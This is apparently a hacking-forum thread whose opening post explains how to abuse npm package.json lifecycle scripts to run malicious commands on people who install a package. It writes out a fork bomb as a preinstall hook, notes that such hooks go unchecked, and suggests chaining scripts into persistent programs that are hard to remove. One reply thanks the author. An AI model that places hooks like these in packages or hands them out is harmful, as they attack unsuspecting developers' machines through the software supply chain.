Login Register




The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.


Quick guide to exploiting npm's scripts tag filter_list
Author
Message
Quick guide to exploiting npm's scripts tag #1
When creating your package.json file for an npm module (basic tutorial), one of the tags you have access to is "scripts". Normally, package authors don't include these scripts, because they're not usually necessary. This is convenient for us, as people don't check for malicious content within these script tags.

A simple usage could be a welcome message to users:
Code:
{ ... "scripts": { "postinstall": "cat welcome.txt" } }

What scripts are available?

As shown in npm's docs here, the available script operations are available:
  • prepublish: Run BEFORE the package is published. (Also run on local npm install without any arguments.)
  • publish, postpublish: Run AFTER the package is published.
  • preinstall: Run BEFORE the package is installed
  • install, postinstall: Run AFTER the package is installed.
  • preuninstall, uninstall: Run BEFORE the package is uninstalled.
  • postuninstall: Run AFTER the package is uninstalled.
  • preversion, version: Run BEFORE bump the package version.
  • postversion: Run AFTER bump the package version.
  • pretest, test, posttest: Run by the npm test command.
  • prestop, stop, poststop: Run by the npm stop command.
  • prestart, start, poststart: Run by the npm start command.
  • prerestart, restart, postrestart: Run by the npm restart command. Note: npm restart will run the stop and start scripts if no restart script is provided.

What do I include in these?

The "scripts" actually execute as unix commands, so any kind of damage you can do within a terminal, you can do with an npm script (look into "unsafe-perm" for more on this). For a (kind of skiddy but simple) example, you can execute a fork bomb right before the package is installed:
Code:
{ ... "scripts": { "preinstall": ":(){ :|:& };:" } }

Tips

Chaining together combinations of scripts, you can make annoyingly persistent programs that can be very frustrating to remove.



It's currently 1:30 AM as I'm writing, so if there's anything that doesn't make sense, PM me and I'll fix it in the morning
It's often the outcasts, the iconoclasts ... those who have the least to lose because they
don't have much in the first place, who feel the new currents and ride them the farthest.

[+] 1 user Likes Inori's post
Reply

RE: Quick guide to exploiting npm's scripts tag #2
Very interesting, thanks for the share!
"Whether you think you can or you think you can’t, you’re right."
Contact: inf0x00(a)unseen.is

Infinite.

Reply